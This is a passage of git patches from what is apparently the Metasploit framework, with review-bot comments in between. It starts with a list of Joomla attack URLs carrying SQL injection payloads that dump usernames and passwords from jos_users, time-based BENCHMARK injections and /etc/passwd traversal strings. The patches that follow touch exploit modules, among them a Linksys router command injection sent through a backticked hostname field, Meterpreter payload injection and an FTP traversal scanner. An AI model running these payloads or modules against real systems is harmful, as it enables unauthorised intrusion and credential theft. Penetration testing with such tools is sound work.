-index.php?option=com_obsuggest&controller= -index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- -index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- -index.php?option=com_oziogallery&Itemid= -index.php?option=com_page&id=53 -index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) -index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 -index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] -index.php?option=com_phocagallery&view=categories&Itemid= -index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_php&file=../../../../../../../../../../etc/passwd -index.php?option=com_php&file=../images/phplogo.jpg -index.php?option=com_php&file=../js/ie_pngfix.js -index.php?option=com_ponygallery&Itemid=[sqli] -index.php?option=com_products&catid=-1 -index.php?option=com_products&id=-1 -index.php?option=com_products&product_id=-1 -index.php?option=com_products&task=category&catid=-1 -index.php?option=com_properties&task=agentlisting&aid= -index.php?option=com_qcontacts&Itemid=1' -index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts -index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_restaurantguide&view=country&id='&Itemid=69 -index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' -index.php?option=com_seyret&view= -index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- -index.php?option=com_smartsite&controller= -index.php?option=com_spa&view=spa_product&cid= -index.php?option=com_spidercalendar -index.php?option=com_spidercalendar&date=1' 
-index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_staticxt&staticfile=test.php&id=1923 -index.php?option=com_szallasok&mode=8&id=25 (SQL) -index.php?option=com_tag&task=tag&tag= -index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- -index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users -index.php?option=com_ultimateportfolio&controller= -index.php?option=com_users&view=registration -index.php?option=com_virtuemart&page=account.index&keyword=[sqli] -index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_x-shop&action=artdetail&idd=' -index.php?option=com_x-shop&action=artdetail&idd='[SQLi] -index.php?option=com_xcomp&controller=../../[LFI]%00 -index.php?option=com_xvs&controller=../../[LFI]%00 -index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- -index.php?option=com_yjcontactus&view= -index.php?option=com_youtube&id_cate=4 -index.php?option=com_zina&view=zina&Itemid=9 -index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= -index.php?search=NoGe&option=com_esearch&searchId= -index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube 
-index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- -js/index.php?option=com_socialads&view=showad&Itemid=94 -libraries/joomla/utilities/compat/php50x.php -libraries/pcl/pcltar.php -libraries/phpmailer/phpmailer.php -libraries/phpxmlrpc/xmlrpcs.php -modules/mod_artuploader/upload.php"); -modules/mod_as_category.php -modules/mod_calendar.php -modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] -modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); -modules/mod_jfancy/script.php"); -modules/mod_ppc_simple_spotlight/elements/upload_file.php -modules/mod_ppc_simple_spotlight/img/ -modules/mod_pxt/ -modules/mod_quick_question.php -modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 -patch/makedown.php?arquivo=../../../../etc/passwd -plugins/content/efup_files/helper.php"); -plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> -plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ -plugins/editors/xstandard/attachmentlibrary.php -print.php?task=person&id=36 and 1=1 -templates/be2004-2/ -templates/ja_purity/ -wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- -web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 7b497d1846b9..798496cb7448 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb 
@@ -101,7 +101,7 @@ def run_host(ip) 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - + apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort From 6cdb1a80de61b46853401ef971d7bd470c52ad81 Mon Sep 17 00:00:00 2001 From: f8lerror <f8lerror+git@gmail.com> Date: Thu, 24 Jan 2013 09:47:20 -0500 Subject: [PATCH 146/421] Remove app from fingerprint and blank line --- modules/auxiliary/scanner/http/joomla_vulnscan.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 798496cb7448..1c465719f1a3 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -52,7 +52,7 @@ def osfingerprint(response) return os end - def fingerprint(response, app) + def fingerprint(response) if(response.body =~ /<version.*\/?>(.+)<\/version\/?>/i) v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" @@ -101,7 +101,6 @@ def run_host(ip) 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort @@ -137,7 +136,7 @@ def check_app(tpath, app, ip) res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) if (res.code == 200) - out = fingerprint(res,app) + out = fingerprint(res) return if not out if(out =~ /Unknown Joomla/) print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") 
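Review bot: In the `check_app` hunk, `res.body.gsub!(/[\r|\n]/, ' ')` treats `|` as a literal member of the character class, so every pipe in the response body is replaced along with the line breaks before `osfingerprint` and `fingerprint` read it. The class should be `/[\r\n]/`. `check_app` starts and ends outside the hunk, so whether `res` is checked for nil before this line cannot be confirmed from here.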
From 2cedcad810a168f08a12bce2c73717d3547c47f0 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 24 Jan 2013 10:46:23 -0600 Subject: [PATCH 147/421] Check PID --- .../exploits/windows/local/payload_inject.rb | 25 ++++++++++++++++++- 1 file changed, 24 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index cc4efe818254..38eab33c686d 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -65,7 +65,7 @@ def exploit # Figures out which PID to inject to def get_pid pid = datastore['PID'] - if pid == 0 or datastore['NEWPROCESS'] + if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid) print_status("Launching notepad.exe...") pid = create_temp_proc end @@ -73,6 +73,29 @@ def get_pid return pid end + + # Determines if a PID actually exists + def has_pid?(pid) + procs = [] + begin + procs = client.sys.process.processes + rescue Rex::Post::Meterpreter::RequestError + print_error("Unable to enumerate processes") + return false + end + + pids = [] + + procs.each do |p| + found_pid = p['pid'] + return true if found_pid == pid + end + + print_error("PID #{pid.to_s} does not actually exist.") + + return false + end + # Checks the Architeture of a Payload and PID are compatible # Returns true if they are false if they are not def arch_check(pid) From 1fc747994e663c7d0dae0e9cec2a74143cb0214f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 24 Jan 2013 17:50:14 +0100 Subject: [PATCH 148/421] cleanup for linksys_wrt54gl_exec --- .../admin/http/linksys_wrt54gl_exec.rb | 225 +++++++++--------- 1 file changed, 118 insertions(+), 107 deletions(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 8f270248e433..ea37ca8e21a8 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb 
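Review bot: `has_pid?` returns false both when the PID is absent and when process enumeration raises `Rex::Post::Meterpreter::RequestError`, and `get_pid` treats either result as a reason to start notepad.exe, so an enumeration failure looks to the caller like a missing PID. The comment above the method should say so, e.g. `# Returns true only if the PID is in the session's process list; false if it is absent or the list cannot be read`. Inside the method `pids = []` is never used, the loop can be written `return true if procs.any? { |p| p['pid'] == pid }`, and `#{pid.to_s}` needs no `to_s` inside interpolation.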
+++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -17,14 +17,14 @@ def initialize(info = {}) 'Description' => %q{ Some Linksys Routers are vulnerable to OS Command injection. You will need credentials to the web interface to access the vulnerable part - of the application. - Default credentials are always a good starting point. admin/admin or admin + of the application. + Default credentials are always a good starting point. admin/admin or admin and blank password could be a first try. - Note: This is a blind os command injection vulnerability. This means that - you will not see any output of your command. Try a ping command to your + Note: This is a blind os command injection vulnerability. This means that + you will not see any output of your command. Try a ping command to your local system for a first test. - - Hint: To get a remote shell you could upload a netcat binary and exec it. + + Hint: To get a remote shell you could upload a netcat binary and exec it. WARNING: Backup your network and dhcp configuration. We will overwrite it! Have phun }, @@ -37,7 +37,7 @@ def initialize(info = {}) [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ], [ 'EDB', '24202' ], [ 'BID', '57459' ], - [ 'OSVDB', '89421' ], + [ 'OSVDB', '89421' ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 18 2013')) 
@@ -47,13 +47,13 @@ def initialize(info = {}) Opt::RPORT(80), OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), - OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'password']), OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']), OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), - OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']), + OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']) ], self.class) end @@ -66,7 +66,7 @@ def run routername = datastore['ROUTER_NAME'] wandomain = datastore['WAN_DOMAIN'] wanmtu = datastore['WAN_MTU'] - + if datastore['LANIP'] !~ /1.1.1.1/ #there is a configuration from the user so we use LANIP for the router configuration ip = datastore['LANIP'].split('.') @@ -74,9 +74,8 @@ def run #no configuration from user so we use RHOST for the router configuration ip = rhost.split('.') end - - # not sure if this is a good way for blank passwords: - if datastore['PASSWORD'] == "<BLANK>" + + if datastore['PASSWORD'].nil? pass = "" else pass = datastore['PASSWORD'] 
@@ -84,108 +83,120 @@ def run print_status("Trying to login with #{user} / #{pass}") - begin - res = send_request_cgi({ - 'uri' => uri, - 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" - }) - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{rhost} not responding") - end - - return :abort if (res.code == 404) - - if [200, 301, 302].include?(res.code) - print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") - else - print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") - return :abort - end - - rescue ::Rex::ConnectionError - vprint_error("#{rhost} - Failed to connect to the web server") - return :abort - end - - print_status("Sending remote command: " + datastore['CMD']) + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{rhost} not responding") + return :abort + end + + if (res.code == 404) + print_error("Not Found page returned") + return :abort + end + + if [200, 301, 302].include?(res.code) + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + else + print_error("NO SUCCESSFUL LOGIN POSSIBLE. 
'#{user}' : '#{pass}'") + return :abort + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost} - Failed to connect to the web server") + return :abort + end - # cmd = Rex::Text.uri_encode(datastore['CMD']) cmd = datastore['CMD'] + print_status("Sending remote command: " + cmd) + + #cmd = Rex::Text.uri_encode(datastore['CMD']) #original Post Request: -# data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" + #data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&" + #data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&" + #data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&" + #data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&" + #data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&" + #data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&" + #data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&" + #data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" - if datastore['VERBOSE'] == true - print_line("using the following 
target URL: \n#{uri}") - end + vprint_status("using the following target URL: #{uri}") begin - res = send_request_cgi( - { - 'uri' => uri, - 'method' => 'POST', - 'basic_auth' => "#{pass}:#{pass}", - #'data' => data_cmd, - - 'vars_post' => - { - 'submit_button' => "index", - 'change_action' => "1", - 'submit_type' => "1", - 'action' => "Apply", - 'now_proto' => "dhcp", - 'daylight_time' => "1", - 'lan_ipaddr' => "4", - 'wait_time' => "0", - 'need_reboot' => "0", - 'ui_language' => "de", - 'wan_proto' => "dhcp", - 'router_name' => "#{routername}", - 'wan_hostname' => "`#{cmd}`", - 'wan_domain' => "#{wandomain}", - 'mtu_enable' => "1", - 'wan_mtu' => "#{wanmtu}", - 'lan_ipaddr_0' => "#{ip[0]}", - 'lan_ipaddr_1' => "#{ip[1]}", - 'lan_ipaddr_2' => "#{ip[2]}", - 'lan_ipaddr_3' => "#{ip[3]}", - 'lan_netmask' => "#{netmask}", - 'lan_proto' => "dhcp", - 'dhcp_check' => "1", - 'dhcp_start' => "100", - 'dhcp_num' => "50", - 'dhcp_lease' => "0", - 'wan_dns' => "4", - 'wan_dns0_0' => "0", - 'wan_dns0_1' => "0", - 'wan_dns0_2' => "0", - 'wan_dns0_3' => "0", - 'wan_dns1_0' => "0", - 'wan_dns1_1' => "0", - 'wan_dns1_2' => "0", - 'wan_dns1_3' => "0", - 'wan_dns2_0' => "0", - 'wan_dns2_1' => "0", - 'wan_dns2_2' => "0", - 'wan_dns2_3' => "0", - 'wan_wins' => "4", - 'wan_wins_0' => "0", - 'wan_wins_1' => "0", - 'wan_wins_2' => "0", - 'wan_wins_3' => "0", - 'time_zone' => "-08+1+1", - '_daylight_time' => '1' - }, - }) - rescue ::Rex::ConnectionError - vprint_error("#{rhost} - Failed to connect to the web server") - return :abort - end - print_line("") + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'basic_auth' => "#{pass}:#{pass}", + #'data' => data_cmd, + + 'vars_post' => { + 'submit_button' => "index", + 'change_action' => "1", + 'submit_type' => "1", + 'action' => "Apply", + 'now_proto' => "dhcp", + 'daylight_time' => "1", + 'lan_ipaddr' => "4", + 'wait_time' => "0", + 'need_reboot' => "0", + 'ui_language' => "de", + 'wan_proto' => "dhcp", + 'router_name' => 
"#{routername}", + 'wan_hostname' => "`#{cmd}`", + 'wan_domain' => "#{wandomain}", + 'mtu_enable' => "1", + 'wan_mtu' => "#{wanmtu}", + 'lan_ipaddr_0' => "#{ip[0]}", + 'lan_ipaddr_1' => "#{ip[1]}", + 'lan_ipaddr_2' => "#{ip[2]}", + 'lan_ipaddr_3' => "#{ip[3]}", + 'lan_netmask' => "#{netmask}", + 'lan_proto' => "dhcp", + 'dhcp_check' => "1", + 'dhcp_start' => "100", + 'dhcp_num' => "50", + 'dhcp_lease' => "0", + 'wan_dns' => "4", + 'wan_dns0_0' => "0", + 'wan_dns0_1' => "0", + 'wan_dns0_2' => "0", + 'wan_dns0_3' => "0", + 'wan_dns1_0' => "0", + 'wan_dns1_1' => "0", + 'wan_dns1_2' => "0", + 'wan_dns1_3' => "0", + 'wan_dns2_0' => "0", + 'wan_dns2_1' => "0", + 'wan_dns2_2' => "0", + 'wan_dns2_3' => "0", + 'wan_wins' => "4", + 'wan_wins_0' => "0", + 'wan_wins_1' => "0", + 'wan_wins_2' => "0", + 'wan_wins_3' => "0", + 'time_zone' => "-08+1+1", + '_daylight_time' => '1' + } + }) + rescue ::Rex::ConnectionError + vprint_error("#{rhost} - Failed to connect to the web server") + return :abort + end + + if res and res.code == 200 + print_status("Blind Exploitation - Response expected") + else + print_error("Blind Exploitation - Response don't expected") + end print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed") - print_status("Blind Exploitation - unknown Exploitation state\n") + print_status("Blind Exploitation - unknown Exploitation state") end end From 3faf4b3aca2e87a69c8e24db669e4832e7727261 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 24 Jan 2013 18:13:30 +0100 Subject: [PATCH 149/421] adding sinn3r as author --- modules/exploits/windows/local/payload_inject.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 38eab33c686d..0e748cb6072b 100644 --- a/modules/exploits/windows/local/payload_inject.rb 
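Review bot: The POST request in the rewritten `run` body still sends `'basic_auth' => "#{pass}:#{pass}"`, while the login check earlier in the same hunk uses `"#{user}:#{pass}"`, so the two requests do not authenticate as the same account; the second should read `'basic_auth' => "#{user}:#{pass}",`. The result reporting is also unclear: `"Blind Exploitation - Response don't expected"` is printed for any non-200 or missing response, and both branches are followed by "unknown Exploitation state", so the operator cannot tell a rejected request from an accepted one. The commented-out `data_cmd` block and `#'data' => data_cmd,` are dead code and can be dropped.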
+++ b/modules/exploits/windows/local/payload_inject.rb @@ -23,7 +23,8 @@ def initialize(info={}) 'License' => MSF_LICENSE, 'Author' => [ - 'Carlos Perez <carlos_perez[at]darkoperator.com>' + 'Carlos Perez <carlos_perez[at]darkoperator.com>', + 'sinn3r' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], From 9aaca2eae9f7bf9c0fe9818bd5cea7b32dae966c Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Thu, 24 Jan 2013 22:07:17 +0200 Subject: [PATCH 150/421] Auxiliary::Web::HTTP: updated exception handling [FIXRM #7724] Updated #run and #_requestto rescue and elog all exception. --- lib/msf/core/auxiliary/web/http.rb | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index a26111355676..0a59187c02f2 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -120,10 +120,15 @@ def run tl = [] loop do - # Spawn threads for each host while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop) tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request| - request.handle_response request( request.url, request.opts ) + # Keep callback failures isolated. + begin + request.handle_response request( request.url, request.opts ) + rescue => e + elog e.to_s + e.backtrace.each { |l| elog l } + end end end @@ -291,7 +296,12 @@ def _request( url, opts = {} ) Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out - rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout + #rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout + # This is bad but we can't anticipate the gazilion different types of network + # i/o errors between Rex and Errno. + rescue => e + elog e.to_s + e.backtrace.each { |l| elog l } Response.empty end 
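Review bot: The new `rescue => e` in `_request` turns every StandardError into `Response.empty`, so a coding error inside the request path (a NoMethodError, a bad option value) reaches callers looking exactly like a host that sent nothing, and a scan can come back clean for the wrong reason. A narrower clause such as `rescue ::SystemCallError, ::SocketError, Rex::ConnectionError => e` should still cover the Errno and Rex network failures the added comment is worried about, and the commented-out `#rescue ::Errno::EPIPE, ...` line can then be deleted instead of kept as dead text. The same log-and-continue pattern in the `run` hunk above is reasonable there, since it isolates one callback per thread. Both methods start and end outside these hunks.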
From af3a1db4c16122c1ffad748b637d0f28d0752352 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 24 Jan 2013 14:16:01 -0600 Subject: [PATCH 151/421] Make better use of ruby regex --- modules/auxiliary/scanner/http/cold_fusion_version.rb | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 1f7169e41587..64bb92f12aaf 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -39,8 +39,7 @@ def fingerprint(response) return nil if response.body.length < 100 title = "Not Found" - response.body.gsub!(/[\r\n]/, '') - if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i) + if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/im) title = $1 title.gsub!(/\s/, '') end 
@@ -51,11 +50,11 @@ def fingerprint(response) if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//) v = $1 out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}" - elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ ) + elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995\-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ ) out = "Adobe ColdFusion MX7" - elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/) + elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2006 Adobe/) out = "Adobe ColdFusion 8" - elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or + elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ or response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/) out = "Adobe ColdFusion 9" elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/) @@ -79,7 +78,7 @@ def run_host(ip) res = send_request_cgi({ 'uri' => url, 'method' => 'GET', - }, 10) + }) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') From fbbac2bd5161e47041414ebeee046be27a499e34 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 24 Jan 2013 21:37:04 +0100 Subject: [PATCH 152/421] make module msftidy compliant --- modules/post/multi/manage/sudo.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index 8b7b2f672f00..41155587d1ad 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb 
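Review bot: The backslashes added in `1995\-2012`, `1995\-2006` and `1995\-2010` change nothing, because `-` is only special inside a character class; the three patterns match exactly what they matched before this hunk. Leaving the hyphens unescaped keeps the literals readable, and the existing `1995\-2009` line and the `\"` and `\,` escapes in the same branch could be simplified the same way. `fingerprint` starts and ends outside this hunk.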
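Review bot: The context line `res.body.gsub!(/[\r|\n]/, ' ')` in `run_host` uses a character class, so the `|` is a literal and every pipe in the response body is replaced by a space along with CR and LF; `res.body.gsub!(/[\r\n]/, ' ')` is what the line appears to intend. Whether `fingerprint` is handed the body after this substitution is not visible in the hunk; if it is, the `/m` flag added in the first hunk of this commit has no effect, and if it is not, the remaining patterns in `fingerprint` now see raw newlines for the first time. `run_host` continues outside this hunk.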
@@ -30,9 +30,11 @@ def initialize(info={}) versions from 2008 and later which support -A. }, 'License' => MSF_LICENSE, - 'Author' => [ 'todb <todb[at]metasploit.com>', - 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option - ], + 'Author' => + [ + 'todb <todb[at]metasploit.com>', + 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option + ], 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ @@ -66,7 +68,7 @@ def run def get_root if datastore['PASSWORD'] password = datastore['PASSWORD'] - else + else password = session.exploit_datastore['PASSWORD'] end From 15253f23bf033156289bbe1d2bf811a01d6fa316 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Thu, 24 Jan 2013 15:29:35 -0600 Subject: [PATCH 153/421] added RHOSTS funct --- .../ftp/titanftp_xcrc_traversal.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) rename modules/auxiliary/{admin => scanner}/ftp/titanftp_xcrc_traversal.rb (92%) diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb similarity index 92% rename from modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb rename to modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index 476ccc65f2bf..e28eaa05620b 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner def proto 'ftp' @@ -28,7 +29,11 @@ def initialize Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server's root directory. }, - 'Author' => 'jduck', + 'Author' => + [ + 'jduck', + 'Brandon McCann @zeknox <bmccann[at]accuvant.com>', + ], 'License' => MSF_LICENSE, 'References' => [ 
